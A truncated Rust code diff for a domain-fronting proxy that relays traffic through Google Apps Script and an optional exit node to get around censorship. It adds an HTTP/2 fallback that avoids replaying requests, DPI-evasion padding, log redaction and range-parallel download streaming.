                 tracing::debug!("relay attempt 1 failed: {}; retrying", e);
                 self.do_relay_once(method, url, headers, body).await
@@ -924,9 +2447,102 @@ impl DomainFronter {
         headers: &[(String, String)],
         body: &[u8],
     ) -> Result<Vec<u8>, FronterError> {
-        let payload = self.build_payload_json(method, url, headers, body)?;
+        // Build once, wrap in Bytes (zero-copy move). h2 takes a clone
+        // (Arc bump, not memcpy); h1 fallback uses the same Bytes via
+        // Deref<&[u8]>. Saves a full payload allocation+copy per call
+        // — meaningful on range-parallel fan-out where N copies fire
+        // in parallel for one user-facing GET.
+        let payload: Bytes = Bytes::from(self.build_payload_json(method, url, headers, body)?);
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // h2 fast path: one shared TCP/TLS connection multiplexes all
+        // streams.
+        //
+        // The h2 layer reports `RequestSent::No` when it can prove
+        // the request never reached Apps Script (ensure_h2 unavailable,
+        // ready/back-pressure timeout, send_request error). In that
+        // case we fall through to h1 unconditionally — there's no
+        // duplication risk.
+        //
+        // For `RequestSent::Maybe` (anything after send_request
+        // succeeded) we only fall through for HTTP-idempotent methods.
+        // POST / PUT / PATCH / DELETE get wrapped in
+        // `FronterError::NonRetryable` so `do_relay_with_retry`'s
+        // outer retry also skips replay — without that wrap, the
+        // outer retry would re-issue the request anyway and the
+        // safety policy would be illusory.
+        match self
+            .h2_relay_request(
+                &path,
+                payload.clone(),
+                Duration::from_secs(H2_RESPONSE_DEADLINE_DEFAULT_SECS),
+            )
+            .await
+        {
+            Ok((status, _hdrs, _resp_body)) if is_h2_fronting_refusal_status(status) => {
+                // Edge rejected the fronted h2 request before
+                // forwarding to Apps Script. Sticky-disable h2,
+                // log once, fall through to h1 — this request is
+                // safe to replay because it never reached Apps Script.
+                self.sticky_disable_h2_for_fronting_refusal(
+                    status,
+                    &format!("relay {} {}", method, url),
+                )
+                .await;
+                // fall through to h1
+            }
+            Ok((status, _hdrs, resp_body)) => {
+                if status != 200 {
+                    let body_txt = String::from_utf8_lossy(&resp_body)
+                        .chars()
+                        .take(200)
+                        .collect::<String>();
+                    if should_blacklist(status, &body_txt) {
+                        self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                    }
+                    return Err(FronterError::Relay(format!(
+                        "Apps Script HTTP {}: {}",
+                        status, body_txt
+                    )));
+                }
+                return parse_relay_json(&resp_body).map_err(|e| {
+                    if let FronterError::Relay(ref msg) = e {
+                        if looks_like_quota_error(msg) {
+                            self.blacklist_script(&script_id, msg);
+                        }
+                    }
+                    e
+                });
+            }
+            Err((e, RequestSent::No)) => {
+                tracing::debug!("h2 pre-send failure: {} — falling back to h1", e);
+            }
+            Err((e, RequestSent::Maybe)) => {
+                if is_method_safe_for_fanout(method) {
+                    tracing::debug!(
+                        "h2 post-send failure for safe method {}: {} — falling back to h1",
+                        method,
+                        e
+                    );
+                } else {
+                    tracing::warn!(
+                        "h2 post-send failure for non-idempotent {} {}: {} — \
+                         marking non-retryable to prevent duplicating side effects",
+                        method,
+                        url,
+                        e
+                    );
+                    // NonRetryable wrapper bubbles all the way through
+                    // do_relay_once_with → do_relay_with_retry, where
+                    // the retry loop skips its second attempt. Without
+                    // this wrap, returning a plain Err would let
+                    // do_relay_with_retry re-issue the request via h1
+                    // (or a fresh h2 cell), defeating the safety policy.
+                    return Err(FronterError::NonRetryable(Box::new(e)));
+                }
+            }
+        }
+
         let mut entry = self.acquire().await?;
         let reuse_ok = {
             let write_res = async {
@@ -1024,6 +2640,245 @@ impl DomainFronter {
         }
     }
 
+    /// Send a request through the configured exit node, chained inside
+    /// an Apps Script call. Path:
+    ///
+    /// ```text
+    /// client → SNI rewrite → Apps Script (Google IP)
+    ///        → UrlFetchApp.fetch(exit_node_url)
+    ///        → exit node (non-Google IP)
+    ///        → fetch(real_url)
+    ///        → response back through both layers
+    /// ```
+    ///
+    /// Apps Script sees the outer call (URL = exit_node_url, method =
+    /// POST, body = inner relay JSON authenticated with the exit-node
+    /// PSK). The exit node sees the inner JSON, fetches the real
+    /// destination, returns a `{s, h, b}` JSON envelope. Apps Script
+    /// returns that envelope as the body of its raw HTTP response
+    /// (because we set `r: true`). We then unwrap one extra layer:
+    /// extract Apps Script's body → parse the exit-node JSON → reconstruct
+    /// the destination's raw HTTP response so the rest of the proxy
+    /// pipeline (MITM TLS write-back) sees the same shape it gets from
+    /// the regular path.
+    async fn relay_via_exit_node(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Result<Vec<u8>, FronterError> {
+        let inner_json = self.build_exit_node_inner_payload(method, url, headers, body)?;
+
+        // The outer payload is just a normal Apps Script relay request
+        // pointing at the exit-node URL with POST + the inner JSON as body.
+        // Reusing build_payload_json keeps the outer envelope consistent
+        // with everything else (including the random padding for DPI
+        // evasion). The `r: true` flag in RelayRequest makes Code.gs
+        // return exit-node's raw HTTP response, which is what we want to
+        // unwrap below.
+        let exit_url = self.exit_node_url.clone();
+        let outer_headers = vec![(
+            "Content-Type".to_string(),
+            "application/json".to_string(),
+        )];
+        let outer_payload: Bytes = Bytes::from(
+            self.build_payload_json("POST", &exit_url, &outer_headers, &inner_json)?,
+        );
+
+        // Send the outer payload through the relay machinery and get back
+        // Apps Script's response body (which is exit-node's JSON envelope).
+        let app_body = self
+            .send_prebuilt_payload_through_relay(outer_payload)
+            .await?;
+
+        // exit-node's JSON envelope: {s: u16, h: {...}, b: "<base64>"} on
+        // success, {e: "..."} on its own internal error.
+        parse_exit_node_response(&app_body)
+    }
+
+    /// Build the inner-layer payload that the exit node will execute.
+    /// Same wire shape as a normal `RelayRequest` (`{k, m, u, h, b, ct, r}`)
+    /// but `k` is the exit-node PSK rather than the user's Apps Script
+    /// `auth_key`, and we skip the random-padding field — padding only
+    /// helps DPI evasion on the Iran-side leg, which the inner payload
+    /// is invisible to (it's encrypted inside the Apps Script HTTPS
+    /// connection that the ISP can't inspect).
+    fn build_exit_node_inner_payload(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Result<Vec<u8>, FronterError> {
+        let filtered = filter_forwarded_headers(headers);
+        let hmap = if filtered.is_empty() {
+            None
+        } else {
+            let mut m = serde_json::Map::with_capacity(filtered.len());
+            for (k, v) in &filtered {
+                m.insert(k.clone(), Value::String(v.clone()));
+            }
+            Some(m)
+        };
+        let b_encoded = if body.is_empty() {
+            None
+        } else {
+            Some(B64.encode(body))
+        };
+        let ct = if body.is_empty() {
+            None
+        } else {
+            find_header(headers, "content-type")
+        };
+        let req = RelayRequest {
+            k: &self.exit_node_psk,
+            m: method,
+            u: url,
+            h: hmap,
+            b: b_encoded,
+            ct,
+            r: false, // the exit node returns its own JSON envelope, not raw HTTP
+        };
+        Ok(serde_json::to_vec(&req)?)
+    }
+
+    /// Drive the standard script-id rotation + TLS pool send path with
+    /// a payload we already built. Mirrors `do_relay_once_with` but
+    /// returns the **raw response body bytes** (Apps Script's HTTP body)
+    /// instead of running the body through `parse_relay_json` — the
+    /// exit-node path needs to peel off exit-node's JSON envelope, which
+    /// has a different shape from Code.gs's raw-HTTP wrapping.
+    async fn send_prebuilt_payload_through_relay(
+        &self,
+        payload: Bytes,
+    ) -> Result<Vec<u8>, FronterError> {
+        let script_id = self.next_script_id();
+        let path = format!("/macros/s/{}/exec", script_id);
+
+        // h2 fast path. The exit-node outer call is always POST and
+        // carries the inner relay payload — replaying on h1 after the
+        // outer reached Apps Script duplicates the inner request to
+        // the exit node. Only fall back when h2 definitely never sent.
+        // Same default response deadline as the direct path; the
+        // exit-node leg ultimately exits via Apps Script too.
+        match self
+            .h2_relay_request(
+                &path,
+                payload.clone(),
+                Duration::from_secs(H2_RESPONSE_DEADLINE_DEFAULT_SECS),
+            )
+            .await
+        {
+            Ok((status, _hdrs, _resp_body)) if is_h2_fronting_refusal_status(status) => {
+                // Same fronting-refusal path as the direct relay.
+                // Safe to fall back: 421 means the edge rejected
+                // before invoking the exit node.
+                self.sticky_disable_h2_for_fronting_refusal(
+                    status,
+                    "exit-node outer call",
+                )
+                .await;
+                // fall through to h1
+            }
+            Ok((status, _hdrs, resp_body)) => {
+                if status != 200 {
+                    let body_txt = String::from_utf8_lossy(&resp_body)
+                        .chars()
+                        .take(200)
+                        .collect::<String>();
+                    return Err(FronterError::Relay(format!(
+                        "Apps Script HTTP {} (exit-node outer call): {}",
+                        status, body_txt
+                    )));
+                }
+                return Ok(resp_body);
+            }
+            Err((e, RequestSent::No)) => {
+                tracing::debug!(
+                    "h2 exit-node outer call pre-send failure: {} — falling back to h1",
+                    e
+                );
+            }
+            Err((e, RequestSent::Maybe)) => {
+                tracing::warn!(
+                    "h2 exit-node outer call post-send failure: {} — \
+                     marking non-retryable to prevent duplicating the inner request",
+                    e
+                );
+                // NonRetryable propagates back to relay()'s exit-node
+                // match arm, which will *not* fall through to the
+                // direct Apps Script path (that fall-through would
+                // re-send the outer call and could also re-trigger
+                // the inner request to the destination).
+                return Err(FronterError::NonRetryable(Box::new(e)));
+            }
+        }
+
+        let mut entry = self.acquire().await?;
+        let req_head = format!(
+            "POST {path} HTTP/1.1\r\n\
+             Host: {host}\r\n\
+             Content-Type: application/json\r\n\
+             Content-Length: {len}\r\n\
+             Accept-Encoding: gzip\r\n\
+             Connection: keep-alive\r\n\
+             \r\n",
+            path = path,
+            host = self.http_host,
+            len = payload.len(),
+        );
+        entry.stream.write_all(req_head.as_bytes()).await?;
+        entry.stream.write_all(&payload).await?;
+        entry.stream.flush().await?;
+
+        let (mut status, mut resp_headers, mut resp_body) =
+            read_http_response(&mut entry.stream).await?;
+
+        // Follow Apps Script's /exec → /macros/.../exec redirect chain
+        // (typical: 1-2 hops to script.googleusercontent.com). Mirrors
+        // the redirect handling in do_relay_once_with.
+        for _ in 0..5 {
+            if !matches!(status, 301 | 302 | 303 | 307 | 308) {
+                break;
+            }
+            let Some(loc) = header_get(&resp_headers, "location") else {
+                break;
+            };
+            let (rpath, rhost) = parse_redirect(&loc);
+            let rhost = rhost.unwrap_or_else(|| self.http_host.to_string());
+            let req = format!(
+                "GET {rpath} HTTP/1.1\r\n\
+                 Host: {rhost}\r\n\
+                 Accept-Encoding: gzip\r\n\
+                 Connection: keep-alive\r\n\
+                 \r\n",
+            );
+            entry.stream.write_all(req.as_bytes()).await?;
+            entry.stream.flush().await?;
+            let (s, h, b) = read_http_response(&mut entry.stream).await?;
+            status = s;
+            resp_headers = h;
+            resp_body = b;
+        }
+
+        // Don't return to pool — the exit-node path is rare enough that
+        // the connection-reuse semantics aren't worth replicating here.
+        drop(entry);
+
+        if status != 200 {
+            let body_txt = String::from_utf8_lossy(&resp_body)
+                .chars()
+                .take(200)
+                .collect::<String>();
+            return Err(FronterError::Relay(format!(
+                "Apps Script HTTP {} (exit-node outer call): {}",
+                status, body_txt
+            )));
+        }
+        Ok(resp_body)
+    }
+
     fn build_payload_json(
         &self,
         method: &str,
@@ -1060,7 +2915,18 @@ impl DomainFronter {
             ct,
             r: true,
         };
-        Ok(serde_json::to_vec(&req)?)
+        // Serialize via Value so we can splice in the random `_pad` field
+        // without changing RelayRequest's wire schema. Apps Script ignores
+        // unknown JSON fields, so old Code.gs deployments stay compatible
+        // — the pad is just bytes-on-the-wire that the server sees and
+        // discards.
+        let mut v = serde_json::to_value(&req)?;
+        if let Value::Object(map) = &mut v {
+            if !self.disable_padding {
+                add_random_pad(map);
+            }
+        }
+        Ok(serde_json::to_vec(&v)?)
     }
 
     // ────── Full-mode tunnel protocol ──────────────────────────────────
@@ -1076,10 +2942,14 @@ impl DomainFronter {
         sid: Option<&str>,
         data: Option<String>,
     ) -> Result<TunnelResponse, FronterError> {
-        let payload = self.build_tunnel_payload(op, host, port, sid, data)?;
+        let payload: Bytes =
+            Bytes::from(self.build_tunnel_payload(op, host, port, sid, data)?);
         let script_id = self.next_script_id();
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // Skip h2 for tunnel ops — same rationale as tunnel_batch_request_to
+        // (PR #1040): tunnel ops are already single HTTP requests, h2
+        // multiplexing adds no benefit and causes 16-17s long-poll stalls.
         let mut entry = self.acquire().await?;
 
         let req_head = format!(
@@ -1127,42 +2997,55 @@ impl DomainFronter {
             resp_body = b;
         }
 
+        let resp = self.finalize_tunnel_response(&script_id, status, resp_body)?;
+        self.release(entry).await;
+        Ok(resp)
+    }
+
+    /// Validate a tunnel-protocol response (status check + Apps-Script
+    /// HTML-prefix tolerance + JSON parse). Used by both the h2 and h1
+    /// branches of `tunnel_request` so the parsing logic doesn't drift
+    /// across transports.
+    fn finalize_tunnel_response(
+        &self,
+        script_id: &str,
+        status: u16,
+        resp_body: Vec<u8>,
+    ) -> Result<TunnelResponse, FronterError> {
         if status != 200 {
             let body_txt = String::from_utf8_lossy(&resp_body)
                 .chars()
                 .take(200)
                 .collect::<String>();
             if should_blacklist(status, &body_txt) {
-                self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                self.blacklist_script(script_id, &format!("HTTP {}", status));
             }
             return Err(FronterError::Relay(format!(
                 "tunnel HTTP {}: {}",
                 status, body_txt
             )));
         }
-
-        // Parse tunnel response JSON
         let text = std::str::from_utf8(&resp_body)
             .map_err(|_| FronterError::BadResponse("non-utf8 tunnel response".into()))?
             .trim();
-
-        // Apps Script may prepend HTML; extract first {...}
+        // Apps Script may prepend HTML on cold-start or quota-exceeded
+        // pages; extract the first {...} block tolerantly so we don't
+        // bail on a recoverable warning frame.
         let json_str = if text.starts_with('{') {
             text
         } else {
             let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in tunnel response: {}", &text[..text.len().min(200)]))
+                FronterError::BadResponse(format!(
+                    "no json in tunnel response: {}",
+                    &text[..text.len().min(200)]
+                ))
             })?;
             let end = text.rfind('}').ok_or_else(|| {
                 FronterError::BadResponse("no json end in tunnel response".into())
             })?;
             &text[start..=end]
         };
-
-        let resp: TunnelResponse = serde_json::from_str(json_str)?;
-
-        self.release(entry).await;
-        Ok(resp)
+        Ok(serde_json::from_str(json_str)?)
     }
 
     fn build_tunnel_payload(
@@ -1188,6 +3071,9 @@ impl DomainFronter {
         if let Some(d) = data {
             map.insert("d".into(), Value::String(d));
         }
+        if !self.disable_padding {
+            add_random_pad(&mut map);
+        }
         Ok(serde_json::to_vec(&Value::Object(map))?)
     }
 
@@ -1215,10 +3101,18 @@ impl DomainFronter {
         map.insert("k".into(), Value::String(self.auth_key.clone()));
         map.insert("t".into(), Value::String("batch".into()));
         map.insert("ops".into(), serde_json::to_value(ops)?);
-        let payload = serde_json::to_vec(&Value::Object(map))?;
+        if !self.disable_padding {
+            add_random_pad(&mut map);
+        }
+        let payload: Bytes = Bytes::from(serde_json::to_vec(&Value::Object(map))?);
 
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // Skip h2 for tunnel batches. Batched ops are already coalesced
+        // into one HTTP request so h2 multiplexing adds no benefit.
+        // The h1 pool path is simpler and avoids h2-specific overhead
+        // (ready timeout, NonRetryable errors, concurrent stream
+        // contention with long-poll batches).
         let mut entry = self.acquire().await?;
 
         let req_head = format!(
@@ -1237,8 +3131,16 @@ impl DomainFronter {
         entry.stream.write_all(&payload).await?;
         entry.stream.flush().await?;
 
+        // Use the configured `request_timeout_secs` for the header read,
+        // not the hardcoded 10 s default. With Apps Script cold starts
+        // routinely landing in the 8–12 s range, the 10 s cliff was
+        // firing as a false-positive batch timeout (issue #1088), killing
+        // every in-flight tunnel session under it. The outer
+        // `tokio::time::timeout(batch_timeout, ...)` in `fire_batch`
+        // remains the authoritative bound on total batch round-trip time.
+        let batch_timeout = self.batch_timeout();
         let (mut status, mut resp_headers, mut resp_body) =
-            read_http_response(&mut entry.stream).await?;
+            read_http_response_with_header_timeout(&mut entry.stream, batch_timeout).await?;
 
         // Follow redirect chain
         for _ in 0..5 {
@@ -1251,45 +3153,99 @@ impl DomainFronter {
             );
             entry.stream.write_all(req.as_bytes()).await?;
             entry.stream.flush().await?;
-            let (s, h, b) = read_http_response(&mut entry.stream).await?;
+            let (s, h, b) =
+                read_http_response_with_header_timeout(&mut entry.stream, batch_timeout).await?;
             status = s; resp_headers = h; resp_body = b;
         }
 
+        // Route through the same `finalize_batch_response` helper the
+        // h2 path uses. This keeps the redacted-logging policy in
+        // exactly one place — the previous inline parse here logged
+        // raw payload at debug AND error level, which leaked the
+        // base64-encoded tunneled bytes (TCP/UDP packets, possibly
+        // app data or credentials) into bug-report logs. Both
+        // transports now emit only `status=` + `body_len=`, with the
+        // raw body gated behind RUST_LOG=trace.
+        let resp = self.finalize_batch_response(script_id, status, resp_body)?;
+        self.release(entry).await;
+        Ok(resp)
+    }
+
+    /// Parse a batch-tunnel response body once we already have it in
+    /// hand — used by the h2 fast path in `tunnel_batch_request_to`,
+    /// where the response is read off a multiplexed stream rather than
+    /// drained from a checked-out socket. Mirrors the validate-and-parse
+    /// tail of the h1 path (status check + JSON extraction +
+    /// quota-blacklist book-keeping).
+    fn finalize_batch_response(
+        &self,
+        script_id: &str,
+        status: u16,
+        resp_body: Vec<u8>,
+    ) -> Result<BatchTunnelResponse, FronterError> {
         if status != 200 {
-            let body_txt = String::from_utf8_lossy(&resp_body).chars().take(200).collect::<String>();
+            let body_txt = String::from_utf8_lossy(&resp_body)
+                .chars()
+                .take(200)
+                .collect::<String>();
             if should_blacklist(status, &body_txt) {
-                self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                self.blacklist_script(script_id, &format!("HTTP {}", status));
             }
-            return Err(FronterError::Relay(format!("batch tunnel HTTP {}: {}", status, body_txt)));
+            return Err(FronterError::Relay(format!(
+                "batch tunnel HTTP {}: {}",
+                status, body_txt
+            )));
         }
-
         let text = std::str::from_utf8(&resp_body)
             .map_err(|_| FronterError::BadResponse("non-utf8 batch response".into()))?
             .trim();
-
         let json_str = if text.starts_with('{') {
             text
         } else {
             let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in batch response: {}", &text[..text.len().min(200)]))
+                FronterError::BadResponse(format!(
+                    "no json in batch response: {}",
+                    &text[..text.len().min(200)]
+                ))
             })?;
             let end = text.rfind('}').ok_or_else(|| {
                 FronterError::BadResponse("no json end in batch response".into())
             })?;
             &text[start..=end]
         };
-
-        tracing::debug!("batch response body: {}", &json_str[..json_str.len().min(500)]);
-
-        let resp: BatchTunnelResponse = match serde_json::from_str(json_str) {
-            Ok(v) => v,
+        // Don't log payload content. Batch responses carry base64-encoded
+        // tunneled bytes (TCP/UDP packets, possibly app data, possibly
+        // credentials), and even at debug level a leaked log line ends
+        // up in user-shared bug reports. Status + length are sufficient
+        // for diagnosis; full body is available behind RUST_LOG=trace.
+        tracing::debug!(
+            "batch response: status={} body_len={}",
+            status,
+            json_str.len()
+        );
+        tracing::trace!(
+            "batch response body (trace only): {}",
+            &json_str[..json_str.len().min(500)]
+        );
+        match serde_json::from_str(json_str) {
+            Ok(v) => Ok(v),
             Err(e) => {
-                tracing::error!("batch JSON parse error: {} — body: {}", e, &json_str[..json_str.len().min(300)]);
-                return Err(FronterError::Json(e));
+                // Same redaction policy on the error path. Length and
+                // the serde error message are enough to locate the
+                // parse failure (offset / unexpected-token info comes
+                // from `e` itself); the raw body is trace-only.
+                tracing::error!(
+                    "batch JSON parse error: {} (body_len={})",
+                    e,
+                    json_str.len()
+                );
+                tracing::trace!(
+                    "batch parse-error body (trace only): {}",
+                    &json_str[..json_str.len().min(300)]
+                );
+                Err(FronterError::Json(e))
             }
-        };
-        self.release(entry).await;
-        Ok(resp)
+        }
     }
 }
 
@@ -1393,17 +3349,26 @@ fn validate_probe_range(
         return None;
     }
     let range = parse_content_range(headers)?;
-    if range.start != 0 || range.end > requested_end || !content_range_matches_body(range, body.len()) {
+    if range.start != 0 || range.end > requested_end {
         return None;
     }
-    Some(range)
+    if content_range_matches_body(range, body.len())
+        || probe_range_covers_complete_entity(range, requested_end)
+    {
+        return Some(range);
+    }
+    None
 }
 
-fn checked_stitched_range_capacity(total: u64) -> Option<usize> {
-    if total > MAX_STITCHED_RANGE_BYTES {
-        return None;
-    }
-    usize::try_from(total).ok()
+fn probe_range_covers_complete_entity(range: ContentRange, requested_end: u64) -> bool {
+    // Apps Script may decode a gzip body while preserving the origin's
+    // compressed Content-Range. For the synthetic first probe only, a
+    // 0..total-1 range within the requested chunk is enough to prove we
+    // already have the complete entity; later chunks still require exact
+    // Content-Range/body length validation in extract_exact_range_body().
+    range.start == 0
+        && range.end.saturating_add(1) >= range.total
+        && range.total <= requested_end.saturating_add(1)
 }
 
 fn extract_exact_range_body(
@@ -1446,6 +3411,19 @@ fn rewrite_206_to_200(raw: &[u8]) -> Vec<u8> {
 /// wire-level stuff) — we set Content-Length from the body we're
 /// actually shipping.
 fn assemble_full_200(src_headers: &[(String, String)], body: &[u8]) -> Vec<u8> {
+    let mut out = assemble_200_head(src_headers, body.len() as u64);
+    out.extend_from_slice(body);
+    out
+}
+
+/// Build only the `HTTP/1.1 200 OK` head block — status line, headers,
+/// and the `\r\n\r\n` terminator — with `Content-Length:
+/// declared_length`. Used by the streaming side of the range-parallel
+/// path, where the body hasn't been assembled yet but we know its
+/// total size from the probe's `Content-Range`. Matches
+/// `assemble_full_200`'s header-skip rules so the two paths produce
+/// identical headers for a given probe.
+fn assemble_200_head(src_headers: &[(String, String)], declared_length: u64) -> Vec<u8> {
     let skip = |k: &str| {
         matches!(
             k.to_ascii_lowercase().as_str(),
@@ -1467,11 +3445,322 @@ fn assemble_full_200(src_headers: &[(String, String)], body: &[u8]) -> Vec<u8> {
         out.extend_from_slice(v.as_bytes());
         out.extend_from_slice(b"\r\n");
     }
-    out.extend_from_slice(format!("Content-Length: {}\r\n\r\n", body.len()).as_bytes());
-    out.extend_from_slice(body);
+    out.extend_from_slice(format!("Content-Length: {}\r\n\r\n", declared_length).as_bytes());
     out
 }
 
+/// Apply `transform_head` to the head block of an HTTP/1.x response
+/// (everything up to and including the first `\r\n\r\n` terminator),
+/// then write the transformed head followed by the unchanged body to
+/// `writer`. If the response can't be parsed as HTTP/1.x (no header
+/// terminator), passes the bytes through unchanged. This is the
+/// buffered-path bridge to the writer-based API: callers see the
+/// same head-rewrite policy regardless of whether we took the
+/// streaming or buffered branch.
+async fn write_response_with_head_transform<W, F>(
+    writer: &mut W,
+    response: &[u8],
+    transform_head: &F,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    F: Fn(&[u8]) -> Vec<u8>,
+{
+    use tokio::io::AsyncWriteExt;
+
+    let sep = b"\r\n\r\n";
+    let Some(idx) = response.windows(sep.len()).position(|w| w == sep) else {
+        writer.write_all(response).await?;
+        return Ok(());
+    };
+    let head_with_terminator = &response[..idx + sep.len()];
+    let body = &response[idx + sep.len()..];
+    let new_head = transform_head(head_with_terminator);
+    writer.write_all(&new_head).await?;
+    writer.write_all(body).await?;
+    Ok(())
+}
+
+/// Three-way dispatch for the range-parallel response delivery in
+/// `do_relay_parallel_range_to`. Extracted as a pure function so the
+/// branching contract is unit-testable without a live `DomainFronter`,
+/// and split into an enum so the writer-based and `Vec<u8>` APIs can
+/// pick different cutoffs (which is exactly the regression that
+/// motivated PR #1043's third-round review).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum RangeDispatch {
+    /// Stitch all chunks into a single in-memory buffer, then deliver
+    /// the response to the writer in one shot. Chunk failure falls
+    /// back to a single GET — which actually recovers when the file
+    /// fits through Apps Script's response cap.
+    Buffered,
+    /// Write the response head + probe body to the wire, then stream
+    /// each remaining chunk in order. Chunk failure truncates the
+    /// response and surfaces as a Content-Length mismatch the
+    /// download client resumes via Range. Only reachable from the
+    /// writer-based API (`streaming_allowed=true`).
+    Stream,
+    /// Fall back to a plain `self.relay()` single GET. Used by the
+    /// `Vec<u8>` compatibility wrapper when the response would
+    /// exceed the buffered stitch buffer's memory cap and the wrapper
+    /// can't take the streaming branch (a `Vec<u8>` consumer can't
+    /// react to a truncated 200 OK — Issue #162).
+    FallbackSingleGet,
+    /// Refuse the response outright with a 502. Only reachable from
+    /// the writer-based API for advertised totals above
+    /// [`MAX_STREAMED_RANGE_BYTES`]. Prevents an absurd
+    /// `Content-Range` total from turning one GET into an unbounded
+    /// stream of chunk Apps Script calls (quota drain DoS — see the
+    /// constant's doc). The compat wrapper has the lower
+    /// [`BUFFERED_STITCH_MAX_BYTES`] cliff above it, so this variant
+    /// is not reachable via `streaming_allowed=false`.
+    RejectTooLarge,
+}
+
+/// Decide how to deliver a range-capable response of size `total`.
+///
+/// Two callers, two contracts:
+///   * Writer-based public API ([`DomainFronter::relay_parallel_range_to`])
+///     passes `streaming_allowed=true`. It streams above
+///     [`APPS_SCRIPT_BODY_MAX_BYTES`] (40 MiB) — that's where
+///     single-GET fallback would fail through Apps Script anyway,
+///     so streaming with truncate-and-resume beats a hard 504.
+///   * `Vec<u8>` compatibility wrapper
+///     ([`DomainFronter::relay_parallel_range`]) passes
+///     `streaming_allowed=false`. It buffers up to
+///     [`BUFFERED_STITCH_MAX_BYTES`] (64 MiB) and only falls back to
+///     single GET above that. The 40-64 MiB band still stitches
+///     successfully (the pre-1.9.23 behavior); above 64 MiB the
+///     wrapper returns whatever Apps Script's single-GET returns
+///     (typically 502/504), matching the pre-1.9.23 cliff exactly.
+fn dispatch_range_response(total: u64, streaming_allowed: bool) -> RangeDispatch {
+    if streaming_allowed && total > MAX_STREAMED_RANGE_BYTES {
+        // Quota-DoS guard for the writer API. The wrapper never
+        // hits this branch because its `streaming_allowed=false`
+        // path is gated by the lower `BUFFERED_STITCH_MAX_BYTES`
+        // (64 MiB) cliff above — Apps Script's single-GET refuses
+        // the response there, no chunk loop runs.
+        RangeDispatch::RejectTooLarge
+    } else if streaming_allowed && total > APPS_SCRIPT_BODY_MAX_BYTES {
+        RangeDispatch::Stream
+    } else if !streaming_allowed && total > BUFFERED_STITCH_MAX_BYTES {
+        RangeDispatch::FallbackSingleGet
+    } else {
+        RangeDispatch::Buffered
+    }
+}
+
+/// Lazy iterator over the byte ranges that need to be fetched after
+/// the probe. Yields `(start, end)` pairs of inclusive byte indices,
+/// each ≤ `chunk_size` long, covering `(probe_end, total - 1]`.
+///
+/// Crucially this is `O(1)` memory regardless of `total`. A hostile or
+/// buggy origin advertising `Content-Range: bytes 0-262143/<huge>`
+/// can pass the probe checks (matching 256 KiB body, valid total) but
+/// must not be allowed to drive an eager `Vec<(u64, u64)>` allocation
+/// — at 256 KiB chunks a claimed 100 TiB total is ~400M tuples
+/// (~6 GB resident). PR #151's original guard was a fixed
+/// `MAX_STITCHED_RANGE_BYTES` cap; the writer-based path replaces it
+/// with this lazy iterator so streaming downloads have no hard size
+/// ceiling but also no eager allocation.
+fn plan_remaining_ranges(
+    probe_end: u64,
+    total: u64,
+    chunk_size: u64,
+) -> impl Iterator<Item = (u64, u64)> {
+    let mut start = probe_end.saturating_add(1);
+    std::iter::from_fn(move || {
+        if start >= total {
+            return None;
+        }
+        let s = start;
+        let e = (s.saturating_add(chunk_size).saturating_sub(1)).min(total - 1);
+        start = e.saturating_add(1);
+        Some((s, e))
+    })
+}
+
+/// Streaming write loop for the range-parallel path. Writes `head`,
+/// then `probe_body`, then each chunk from `fetches` in input order
+/// (which is by-range-start since `fetch_chunks_stream` uses
+/// `buffered` to preserve order). On the first validation failure
+/// flushes the committed prefix and returns `Err`; the partial
+/// response surfaces to the download client as a truncated body
+/// (Content-Length mismatch), which most clients — curl `-C -`,
+/// browsers' built-in download manager, wget — treat as a resumable
+/// failure and reissue via Range from the partial byte count.
+///
+/// The pre-Err flush is load-bearing on TLS streams (and to a
+/// lesser extent on plain sockets with the kernel send buffer):
+/// `write_all` returns once the bytes are in the TLS writer's
+/// in-memory buffer, NOT once they've been encrypted and shipped
+/// down the socket. If we returned `Err` without flushing, the
+/// caller's `?` typically propagates the error and the connection
+/// is dropped — taking buffered ciphertext with it. The client then
+/// sees a clean connection close before any body bytes, instead of
+/// the partial body it needs to compute a resume offset.
+///
+/// Kept as a free function (no `&self`) so the streaming logic can be
+/// unit-tested with synthetic `Stream`s built from `stream::iter(…)`
+/// instead of needing a fully-constructed `DomainFronter`.
+async fn stream_chunks_to_writer<W, S>(
+    writer: &mut W,
+    head: &[u8],
+    probe_body: &[u8],
+    total: u64,
+    fetches: S,
+    url_for_log: &str,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    S: futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)>,
+{
+    use futures_util::stream::StreamExt;
+    use tokio::io::AsyncWriteExt;
+
+    writer.write_all(head).await?;
+    writer.write_all(probe_body).await?;
+    // Flush head + probe body to the wire before kicking off remote
+    // chunk fetches. First bytes hit the client immediately so the
+    // browser / download manager sees the response start (status
+    // code + Content-Length, plus the first 256 KiB of body) while
+    // the Apps Script round-trips for the remaining chunks are in
+    // flight. Without this, intermediate buffering (TLS writer
+    // buffer, kernel send buffer with small initial cwnd, browsers'
+    // own pre-read thresholds) can make the progress bar sit at
+    // zero for the first several hundred ms of the download.
+    //
+    // Propagate flush errors here — if the client already
+    // disconnected, no point firing N more Apps Script calls.
+    writer.flush().await?;
+    futures_util::pin_mut!(fetches);
+
+    // Progress accounting: bytes emitted as wire body so far (the
+    // probe body, plus every successfully-written chunk). The head
+    // doesn't count — it's protocol framing, not body progress.
+    // `next_progress_log_at` is the next body-byte threshold at
+    // which we emit a progress line, advanced past the current
+    // count each time so a single large chunk crossing multiple
+    // intervals only logs once.
+    let mut body_bytes_emitted: u64 = probe_body.len() as u64;
+    let mut next_progress_log_at: u64 = STREAM_PROGRESS_LOG_INTERVAL_BYTES;
+
+    while let Some((s, e, chunk_result)) = fetches.next().await {
+        match chunk_result {
+            Ok(c) => {
